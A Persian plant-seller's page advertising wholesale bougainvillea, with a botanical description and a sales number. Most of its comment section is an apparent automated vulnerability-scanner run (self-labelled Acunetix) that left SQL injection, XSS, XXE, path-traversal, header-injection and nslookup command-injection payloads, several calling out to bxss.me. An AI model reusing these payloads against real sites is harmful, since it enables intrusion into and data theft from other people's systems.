فروش عمده گل کاغذی

نوشته شده توسط ایباغ 2016/12/23 11:37:05 157 نظرات گل ها,

     اسم علمی گل کاغذی Bougainvillea glabra واز خانواده Nyetaginaceae می باشد. گل کاغذی بومی برزیل است و دارای گونه های مختلف می باشد
    ارتفاع این گیاه در گلدان حداکثر در حدود ۲ تا 3.5 متر است. این گونه کولیتواری دارد که حتی موقعی که کوچک است به گل میرود
    برگها نسبتا سبز روشن و تخم مرغی شکل می باشند. گل آذین آن پانیکول بوده و به صورت جامی و انتهایی ظاهر می شوند. گلهای این گیاه زیبا نیست، کاسه گل لوله ای ، زرد و کوچک بوده فاقد جام گل می باشد . ولی دارای براکته‌های رنگین و زیبایی است که اطراف گلهای کرم رنگ را احاطه نموده اند.

 

دوستان و علاقه مندان جهت خرید گل کاغذی در رنگ بندی های مختلف می توانند با واحد فروش ایباغ

09113959194

تماس بگیرند و از قیمت و شرایط فیزیکی گیاه مطلع شوند

 

157 نظرات

حسین حسنی:
2016/12/24 08:39:51, 08:39:51 AM
پاسخ

با عرض سلام خدمت شما.خیلی گلهای قشنگی دارید.امیدوارم همیشه موفق باشید

e:
2017/09/23 04:52:22, 04:52:22 AM, e
پاسخ

response.write(9692716*9832230)

e:
2017/09/23 04:52:24, 04:52:24 AM, e
پاسخ

'+response.write(9692716*9832230)+'

e:
2017/09/23 04:52:26, 04:52:26 AM, e
پاسخ

"+response.write(9692716*9832230)+"

e:
2017/09/23 04:53:23, 04:53:23 AM, e
پاسخ

</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013981&r=23-1219&h=23-99568-2&/).slice(2),document.documentElement.appendChild(s))//'>

e:
2017/09/23 04:53:29, 04:53:29 AM, e
پاسخ

'>"><script src=http://bxss.me/s?u=013981&r=23-1221&h=23-99568-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,013981,23-1221,23,99568,%22%5D"/>

e:
2017/09/23 04:54:08, 04:54:08 AM, e
پاسخ

set|set&set

e:
2017/09/23 04:54:13, 04:54:13 AM, e
پاسخ

$(nslookup dns.ce.\013981.23-1237.23.99568.\1.bxss.me)

e:
2017/09/23 04:54:16, 04:54:16 AM, e
پاسخ

&nslookup dns.ce.\013981.23-1238.23.99568.\1.bxss.me&'\"`0&nslookup dns.ce.\013981.23-1238.23.99568.\1.bxss.me&`'

e:
2017/09/23 04:54:24, 04:54:24 AM, e
پاسخ

OWe3L1jr

e:
2017/09/23 04:55:17, 04:55:17 AM, e
پاسخ

bcc:013981.23-1249.23.99568.1@bxss.me

e:
2017/09/23 04:55:19, 04:55:19 AM, e
پاسخ

to@example.com> bcc:013981.23-1250.23.99568.1@bxss.me

e:
2017/09/23 04:55:30, 04:55:30 AM, e
پاسخ

${9999879+10000290}

e:
2017/09/23 04:55:52, 04:55:52 AM, e
پاسخ

1

e:
2017/09/23 04:55:54, 04:55:54 AM, e
پاسخ

1

e:
2017/09/23 04:55:56, 04:55:56 AM, e
پاسخ

-1 OR 2+559-559-1=0+0+0+1 --

e:
2017/09/23 04:56:05, 04:56:05 AM, e
پاسخ

&n985515=v998798

e:
2017/09/23 04:56:06, 04:56:06 AM, e
پاسخ

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e:
2017/09/23 04:56:08, 04:56:08 AM, e
پاسخ

1some_inexistent_file_with_long_name.jpg

e:
2017/09/23 04:56:11, 04:56:11 AM, e
پاسخ

-1 OR 3+559-559-1=0+0+0+1 --

e:
2017/09/23 04:56:12, 04:56:12 AM, e
پاسخ

e:
2017/09/23 04:56:13, 04:56:13 AM, e
پاسخ

-1 OR 3*2<(0+5+559-559) --

e:
2017/09/23 04:56:13, 04:56:13 AM, e
پاسخ

Http://testasp.vulnweb.com/t/fit.txt

e:
2017/09/23 04:56:16, 04:56:16 AM, e
پاسخ

-1 OR 3*2>(0+5+559-559) --

e:
2017/09/23 04:56:17, 04:56:17 AM, e
پاسخ

http://testasp.vulnweb.com/t/fit.txt?.jpg

e:
2017/09/23 04:56:20, 04:56:20 AM, e
پاسخ

-1 OR 2+730-730-1=0+0+0+1

e:
2017/09/23 04:56:21, 04:56:21 AM, e
پاسخ

testasp.vulnweb.com

e:
2017/09/23 04:56:23, 04:56:23 AM, e
پاسخ

-1 OR 3+730-730-1=0+0+0+1

e:
2017/09/23 04:56:23, 04:56:23 AM, e
پاسخ

)

e:
2017/09/23 04:56:27, 04:56:27 AM, e
پاسخ

!(()&&!|*|*|

e:
2017/09/23 04:56:29, 04:56:29 AM, e
پاسخ

-1 OR 3*2<(0+5+730-730)

e:
2017/09/23 04:56:31, 04:56:31 AM, e
پاسخ

^(#$!@#$)(()))******

e:
2017/09/23 04:56:33, 04:56:33 AM, e
پاسخ

-1 OR 3*2>(0+5+730-730)

e:
2017/09/23 04:56:35, 04:56:35 AM, e
پاسخ

e:
2017/09/23 04:56:35, 04:56:35 AM, e
پاسخ

-1' OR 2+874-874-1=0+0+0+1 --

e:
2017/09/23 04:56:38, 04:56:38 AM, e
پاسخ

'"()

e:
2017/09/23 04:56:38, 04:56:38 AM, e
پاسخ

-1' OR 3+874-874-1=0+0+0+1 --

e:
2017/09/23 04:56:45, 04:56:45 AM, e
پاسخ

-1' OR 3*2<(0+5+874-874) --

e:
2017/09/23 04:56:47, 04:56:47 AM, e
پاسخ

-1' OR 3*2>(0+5+874-874) --

e:
2017/09/23 04:56:56, 04:56:56 AM, e
پاسخ

-1' OR 2+667-667-1=0+0+0+1 or 'Xkq4F049'='

e:
2017/09/23 04:57:17, 04:57:17 AM, e
پاسخ

-1' OR 3+667-667-1=0+0+0+1 or 'Xkq4F049'='

e:
2017/09/23 04:57:24, 04:57:24 AM, e
پاسخ

;print(md5(acunetix_wvs_security_test));

e:
2017/09/23 04:57:26, 04:57:26 AM, e
پاسخ

';print(md5(acunetix_wvs_security_test));$a='

e:
2017/09/23 04:57:26, 04:57:26 AM, e
پاسخ

http://testasp.vulnweb.com/t/xss.html?%00.jpg

e:
2017/09/23 04:57:28, 04:57:28 AM, e
پاسخ

";print(md5(acunetix_wvs_security_test));$a="

e:
2017/09/23 04:57:31, 04:57:31 AM, e
پاسخ

-1' OR 3*2<(0+5+667-667) or 'Xkq4F049'='

e:
2017/09/23 04:57:32, 04:57:32 AM, e
پاسخ

${@print(md5(acunetix_wvs_security_test))}

e:
2017/09/23 04:57:33, 04:57:33 AM, e
پاسخ

-1' OR 3*2>(0+5+667-667) or 'Xkq4F049'='

e:
2017/09/23 04:57:34, 04:57:34 AM, e
پاسخ

${@print(md5(acunetix_wvs_security_test))}\

e:
2017/09/23 04:57:35, 04:57:35 AM, e
پاسخ

-1" OR 2+124-124-1=0+0+0+1 --

e:
2017/09/23 04:57:53, 04:57:53 AM, e
پاسخ

-1" OR 3+124-124-1=0+0+0+1 --

e:
2017/09/23 04:57:56, 04:57:56 AM, e
پاسخ

-1" OR 3*2<(0+5+124-124) --

e:
2017/09/23 04:57:59, 04:57:59 AM, e
پاسخ

-1" OR 3*2>(0+5+124-124) --

e:
2017/09/23 04:58:03, 04:58:03 AM, e
پاسخ

if(now()=sysdate(),sleep(7.18),0)/*'XOR(if(now()=sysdate(),sleep(7.18),0))OR'"XOR(if(now()=sysdate(),sleep(7.18),0))OR"*/

e:
2017/09/23 04:58:08, 04:58:08 AM, e
پاسخ

(select(0)from(select(sleep(10.77)))v)/*'+(select(0)from(select(sleep(10.77)))v)+'"+(select(0)from(select(sleep(10.77)))v)+"*/

e:
2017/09/23 04:58:12, 04:58:12 AM, e
پاسخ

index.php

e:
2017/09/23 04:58:13, 04:58:13 AM, e
پاسخ

http://hitiP0YBt5aL2.bxss.me/

e:
2017/09/23 04:58:15, 04:58:15 AM, e
پاسخ

index.php

e:
2017/09/23 04:58:16, 04:58:16 AM, e
پاسخ

-1; waitfor delay '0:0:10.77' --

e:
2017/09/23 04:58:17, 04:58:17 AM, e
پاسخ

index.php/.

e:
2017/09/23 04:58:29, 04:58:29 AM, e
پاسخ

1 waitfor delay '0:0:10.77' --

e:
2017/09/23 04:58:33, 04:58:33 AM, e
پاسخ

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e:
2017/09/23 04:58:36, 04:58:36 AM, e
پاسخ

vbe94Rni'; waitfor delay '0:0:10.77' --

e:
2017/09/23 04:58:39, 04:58:39 AM, e
پاسخ

-1;select pg_sleep(10.77); --

e:
2017/09/23 04:58:41, 04:58:41 AM, e
پاسخ

-1);select pg_sleep(3.59); --

e:
2017/09/23 04:58:43, 04:58:43 AM, e
پاسخ

-1));select pg_sleep(3.59); --

e:
2017/09/23 04:58:55, 04:58:55 AM, e
پاسخ

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://hitXLxiDo3P6p.bxss.me/"> ]> <xxx>&acunetixent;</xxx>

e:
2017/09/23 04:58:58, 04:58:58 AM, e
پاسخ

MdTD98IA';select pg_sleep(3.59); --

e:
2017/09/23 04:59:03, 04:59:03 AM, e
پاسخ

vUYSaiyw';select pg_sleep(7.18); --

e:
2017/09/23 04:59:07, 04:59:07 AM, e
پاسخ

/www.vulnweb.com

e:
2017/09/23 04:59:09, 04:59:09 AM, e
پاسخ

zRBDyt0r');select pg_sleep(3.59); --

e:
2017/09/23 04:59:13, 04:59:13 AM, e
پاسخ

uqzxnl24');select pg_sleep(7.18); --

e:
2017/09/23 04:59:16, 04:59:16 AM, e
پاسخ

../../../../../../../../../../etc/passwd

e:
2017/09/23 04:59:19, 04:59:19 AM, e
پاسخ

910600

e:
2017/09/23 04:59:20, 04:59:20 AM, e
پاسخ

../../../../../../../../../../../../../../../proc/version

e:
2017/09/23 04:59:25, 04:59:25 AM, e
پاسخ

http://www.vulnweb.com

e:
2017/09/23 04:59:25, 04:59:25 AM, e
پاسخ

SE4PPO4X'));select pg_sleep(3.59); --

e:
2017/09/23 04:59:26, 04:59:26 AM, e
پاسخ

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e:
2017/09/23 04:59:27, 04:59:27 AM, e
پاسخ

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://hitpLlobZlVWM.bxss.me/"> <roottag>acunetix</roottag>

e:
2017/09/23 04:59:28, 04:59:28 AM, e
پاسخ

//www.vulnweb.com

e:
2017/09/23 04:59:29, 04:59:29 AM, e
پاسخ

../../../../../../../../../../etc/passwd.jpg

e:
2017/09/23 04:59:30, 04:59:30 AM, e
پاسخ

/\www.vulnweb.com

e:
2017/09/23 04:59:33, 04:59:33 AM, e
پاسخ

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e:
2017/09/23 04:59:35, 04:59:35 AM, e
پاسخ

/../..//../..//../..//../..//../..//etc/passwd.jpg

e:
2017/09/23 04:59:36, 04:59:36 AM, e
پاسخ

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e:
2017/09/23 04:59:38, 04:59:38 AM, e
پاسخ

1||UTL_INADDR.get_host_address('dns.'||'sqli.013981.23-1265.23.99568.1.bxss'||'.me')

e:
2017/09/23 04:59:41, 04:59:41 AM, e
پاسخ

'||UTL_INADDR.get_host_address('dns.'||'sqli.013981.23-1266.23.99568.1.bxss'||'.me')||'

e:
2017/09/23 04:59:44, 04:59:44 AM, e
پاسخ

/etc/passwd

e:
2017/09/23 04:59:44, 04:59:44 AM, e
پاسخ

'"

e:
2017/09/23 04:59:45, 04:59:45 AM, e
پاسخ

1;copy (select '') to program 'nslookup dns.sqli.\013981.23-1267.23.99568.\1.bxss.me'

e:
2017/09/23 04:59:46, 04:59:46 AM, e
پاسخ

%2fetc%2fpasswd

e:
2017/09/23 04:59:46, 04:59:46 AM, e
پاسخ

<!--

e:
2017/09/23 04:59:48, 04:59:48 AM, e
پاسخ

1';copy (select '') to program 'nslookup dns.sqli.\013981.23-1268.23.99568.\1.bxss.me

e:
2017/09/23 04:59:49, 04:59:49 AM, e
پاسخ

<xi:include href="http://hit3OSZi8ljaD.bxss.me/" parse="text"/>

e:
2017/09/23 04:59:50, 04:59:50 AM, e
پاسخ

940'

e:
2017/09/23 04:59:51, 04:59:51 AM, e
پاسخ

/.././.././.././.././.././.././.././../etc/./passwd%00

e:
2017/09/23 05:00:06, 05:00:06 AM, e
پاسخ

1'"

e:
2017/09/23 05:00:09, 05:00:09 AM, e
پاسخ

\

e:
2017/09/23 05:00:11, 05:00:11 AM, e
پاسخ

@@kEMV3

e:
2017/09/23 05:00:13, 05:00:13 AM, e
پاسخ

JyI=

e:
2017/09/23 05:00:23, 05:00:23 AM, e
پاسخ

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY % xxe SYSTEM "http://hitiFdCHzB235.bxss.me/"> %xxe; ]>

e:
2017/09/23 05:00:27, 05:00:27 AM, e
پاسخ

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE body SYSTEM "http://hiteNYji0F1y5.bxss.me/"> <body><method>test</method></body>

e:
2017/09/23 05:00:36, 05:00:36 AM, e
پاسخ

1'"()&%<acx><ScRiPt >G3rl(9811)</ScRiPt>

e:
2017/09/23 05:00:52, 05:00:52 AM, e
پاسخ

'"()&%<acx><ScRiPt >G3rl(9654)</ScRiPt>

e:
2017/09/23 05:00:53, 05:00:53 AM, e
پاسخ

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e:
2017/09/23 05:00:53, 05:00:53 AM, e
پاسخ

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e:
2017/09/23 05:00:54, 05:00:54 AM, e
پاسخ

19521922

e:
2017/09/23 05:00:55, 05:00:55 AM, e
پاسخ

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e:
2017/09/23 05:00:56, 05:00:56 AM, e
پاسخ

acu1289<s1﹥s2ʺs3ʹuca1289

e:
2017/09/23 05:01:02, 05:01:02 AM, e
پاسخ

{{10000047*10000329}}

e:
2017/09/23 05:01:03, 05:01:03 AM, e
پاسخ

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e:
2017/09/23 05:01:04, 05:01:04 AM, e
پاسخ

1<ScRiPt >G3rl(9219)</ScRiPt>

e:
2017/09/23 05:01:06, 05:01:06 AM, e
پاسخ

file:///etc/passwd

e:
2017/09/23 05:01:08, 05:01:08 AM, e
پاسخ

1<WWCSJ0>ZO8WF[!+!]</WWCSJ0>

e:
2017/09/23 05:01:10, 05:01:10 AM, e
پاسخ

/\../\../\../\../\../\../\../etc/passwd

e:
2017/09/23 05:01:13, 05:01:13 AM, e
پاسخ

1<script>G3rl(9838)</script>

e:
2017/09/23 05:01:14, 05:01:14 AM, e
پاسخ

WEB-INF/web.xml

e:
2017/09/23 05:01:16, 05:01:16 AM, e
پاسخ

1<ScR<ScRiPt>IpT>G3rl(9698)</sCr<ScRiPt>IpT>

e:
2017/09/23 05:01:18, 05:01:18 AM, e
پاسخ

/WEB-INF/web.xml

e:
2017/09/23 05:01:23, 05:01:23 AM, e
پاسخ

WEB-INF\web.xml

e:
2017/09/23 05:01:26, 05:01:26 AM, e
پاسخ

../../../../../../../../../../windows/win.ini

e:
2017/09/23 05:01:30, 05:01:30 AM, e
پاسخ

1<ScRiPt >G3rl(9266)</ScRiPt>

e:
2017/09/23 05:01:31, 05:01:31 AM, e
پاسخ

C:\WINDOWS\system32\drivers\etc\hosts

e:
2017/09/23 05:01:32, 05:01:32 AM, e
پاسخ

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9293></ScRiPt>

e:
2017/09/23 05:01:35, 05:01:35 AM, e
پاسخ

../../../../../../../../../../windows/win.ini.jpg

e:
2017/09/23 05:01:36, 05:01:36 AM, e
پاسخ

1<ScRiPt >G3rl(9303)</ScRiPt>

e:
2017/09/23 05:01:43, 05:01:43 AM, e
پاسخ

1<video><source onerror="javascript:G3rl(9372)">

e:
2017/09/23 05:01:49, 05:01:49 AM, e
پاسخ

1<isindex type=image src=1 onerror=G3rl(9323)>

e:
2017/09/23 05:01:51, 05:01:51 AM, e
پاسخ

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9253'>

e:
2017/09/23 05:01:55, 05:01:55 AM, e
پاسخ

1<body onload=G3rl(9934)>

e:
2017/09/23 05:01:56, 05:01:56 AM, e
پاسخ

1<img src=//testasp.vulnweb.com/t/dot.gif onload=G3rl(9844)>

e:
2017/09/23 05:02:00, 05:02:00 AM, e
پاسخ

1<img src=xyz OnErRor=G3rl(9410)>

e:
2017/09/23 05:02:04, 05:02:04 AM, e
پاسخ

1<img/src=">" onerror=alert(9286)>

e:
2017/09/23 05:02:12, 05:02:12 AM, e
پاسخ

%31%3C%53%63%52%69%50%74%20%3E%47%33%72%6C%289584%29%3C%2F%73%43%72%69%70%54%3E

e:
2017/09/23 05:02:13, 05:02:13 AM, e
پاسخ

................windowswin.ini

e:
2017/09/23 05:02:16, 05:02:16 AM, e
پاسخ

..\..\..\..\..\..\..\..\windows\win.ini

e:
2017/09/23 05:02:21, 05:02:21 AM, e
پاسخ

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

e:
2017/09/23 05:02:22, 05:02:22 AM, e
پاسخ

1\u003CScRiPt\G3rl(9513)\u003C/sCripT\u003E

e:
2017/09/23 05:02:22, 05:02:22 AM, e
پاسخ

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

e:
2017/09/23 05:02:24, 05:02:24 AM, e
پاسخ

1&lt;ScRiPt&gt;G3rl(9818)&lt;/sCripT&gt;

e:
2017/09/23 05:02:25, 05:02:25 AM, e
پاسخ

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

e:
2017/09/23 05:02:27, 05:02:27 AM, e
پاسخ

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

e:
2017/09/23 05:02:28, 05:02:28 AM, e
پاسخ

1<input autofocus onfocus=G3rl(9711)>

e:
2017/09/23 05:02:29, 05:02:29 AM, e
پاسخ

WEB-INF/web.xml

e:
2017/09/23 05:02:31, 05:02:31 AM, e
پاسخ

<a HrEF=http://www.vulnweb.com></a>

e:
2017/09/23 05:02:32, 05:02:32 AM, e
پاسخ

WEB-INF\web.xml

e:
2017/09/23 05:02:35, 05:02:35 AM, e
پاسخ

<a HrEF=jaVaScRiPT:>

e:
2017/09/23 05:02:39, 05:02:39 AM, e
پاسخ

[url=http://www.vulnweb.com][/url]

e:
2017/09/23 05:02:44, 05:02:44 AM, e
پاسخ

1<img<!-- --> src=x onerror=alert(9801);//><!-- -->

e:
2017/09/23 05:02:47, 05:02:47 AM, e
پاسخ

1}body{acu:Expre/**/SSion(G3rl(9189))}

e:
2017/09/23 05:02:53, 05:02:53 AM, e
پاسخ

1<% contenteditable onresize=G3rl(9551)>

e:
2017/09/23 05:02:57, 05:02:57 AM, e
پاسخ

1Aq3Ed <ScRiPt >G3rl(9443)</ScRiPt>

e:
2017/09/23 05:02:58, 05:02:58 AM, e
پاسخ

1<WLBQAL>ZH2AO[!+!]</WLBQAL>

e:
2017/09/23 05:03:05, 05:03:05 AM, e
پاسخ

1<ifRAme sRc=9546.com></IfRamE>

e:
2017/09/23 05:03:10, 05:03:10 AM, e
پاسخ

1<pjVGyU x=9547>

e:
